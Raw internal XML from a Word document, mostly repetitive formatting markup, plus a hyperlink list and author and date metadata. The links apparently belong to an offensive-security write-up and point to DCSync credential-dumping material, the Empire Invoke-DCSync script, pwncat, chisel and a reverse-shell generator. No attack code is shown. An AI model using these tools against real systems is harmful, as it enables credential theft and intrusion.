      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1952277302">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="141310667">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1710490387">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1755277642">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="930818998">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="180512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2708330">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1965770280">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="662416">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1179976023">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="36779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5756867">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1895001337">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1368916621">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="149761260">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="76370062">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="69468879">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="196518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6275477">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1281306084">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1864125380">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="335033207">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="212349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0657272">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2080707220">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="359284640">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="926580135">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="86383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468868">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="666833603">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2132017964">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2094623605">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="151927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105754">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="689334810">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="551767106">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1352293794">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="100998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9350021">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1650556049">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="694189778">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="231811936">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="22479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8166532">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1977948306">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="435756627">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="361059481">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="31202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3719160">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="962081829">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="690691539">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1671593403">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="123489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796781">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1620645782">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1592928888">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="13651065">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="130443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537228">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2052267633">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2074696900">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1840464834">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="77039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5586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www.hackingarticles.in/credential-dumping-dcsync-attack/" TargetMode="External"/><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footer" Target="footer1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pwncat.org/"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48.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attack.mitre.org/techniques/T1556/005/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-DCSync.ps1" TargetMode="External"/><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s://github.com/jpillora/chisel/releases" TargetMode="External"/><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revshells.com/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption" TargetMode="External"/><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597</TotalTime>
  <Pages>31</Pages>
  <Words>3121</Words>
  <Characters>17792</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Bhabesh Kumar Das</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhabesh Kumar Das</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-17T04:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-17T13:57:00Z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1,2,3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ClassificationContentMarkingFooterFontProps">
    <vt:lpwstr>#626469,6,Calibri</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingFooterText">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SetDate">
    <vt:lpwstr>2024-07-17T04:01:57Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
